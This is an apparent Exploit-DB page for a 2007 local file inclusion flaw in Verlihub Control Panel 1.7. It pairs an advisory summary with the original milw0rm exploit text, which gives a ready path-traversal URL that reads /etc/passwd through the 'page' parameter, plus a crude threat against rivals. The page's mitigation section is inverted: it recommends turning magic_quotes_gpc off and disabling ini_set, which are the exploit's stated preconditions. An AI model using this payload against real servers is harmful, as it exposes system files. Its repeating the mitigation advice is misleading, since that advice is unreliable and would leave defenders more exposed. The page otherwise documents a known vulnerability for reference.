Verlihub Control Panel v 1.7 PHP 4.x Local File Inclusion

vendor:

Verlihub Control Panel

by:

Methodman

N/A

CVSS

HIGH

Local File Inclusion

CWE

Product Name: Verlihub Control Panel

Affected Version From: 1.7

Affected Version To: 1.7

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Verlihub Control Panel v 1.7 PHP 4.x Local File Inclusion

The Verlihub Control Panel version 1.7 for PHP 4.x is vulnerable to Local File Inclusion. The vulnerability exists due to the lack of proper input validation in the 'page' parameter of the URL. An attacker can exploit this vulnerability by manipulating the 'page' parameter to include arbitrary local files, such as '/etc/passwd'. This can lead to unauthorized access to sensitive information on the server.

Mitigation:

To mitigate this vulnerability, it is recommended to upgrade to a newer version of the Verlihub Control Panel that has addressed this issue. Additionally, ensure that the 'magic_quotes_gpc' setting is set to 'Off' and the 'ini_set' function is disabled in the PHP configuration.

Source

Exploit-DB raw data:

#####################################################################################
#Verlihub Control Panel v 1.7 PHP 4.x  Local File Inclusion
#http://vhcp.verlihub- project.org/
#
#Bug Found By Methodman
#From TEAMELITE <-> dchub.nemesis.te-home.net:4120
#####################################################################################
#Bug:
#Line: 27 - ini_set("magic_quotes_gpc","1"); ............................ Line: 71 - $page_name =
#isset($_GET['page']) ? $_GET['page'] : (!isset($_SESSION['verliadmin']) ? 'start' : 'start'); .....Line: 145 - #require_once("./pages/$page_name.php");
#####################################################################################
#NEED: magic_quotes=OFF
#
#NEED: disable_functions=ini_set
#####################################################################################
#
#Exploit:
#
#http://site/path/?page=../../../../../../../../etc/passwd%00
#
#
##################################################################################### 
#
#Gr33tZ: To All Members Of TEAMELITE
#       Ashura,Lord_Zero,Meka][Meka,Ne0
#                  AND
#        My Friend  Elekt  From Antichat.
#####################################################################################    
#My 3N3mY ?: ...Mish and Dark If Y0u FUck w1t me,I'll pUt my f00t in y0ur aSs !...
#####################################################################################

# milw0rm.com [2007-10-07]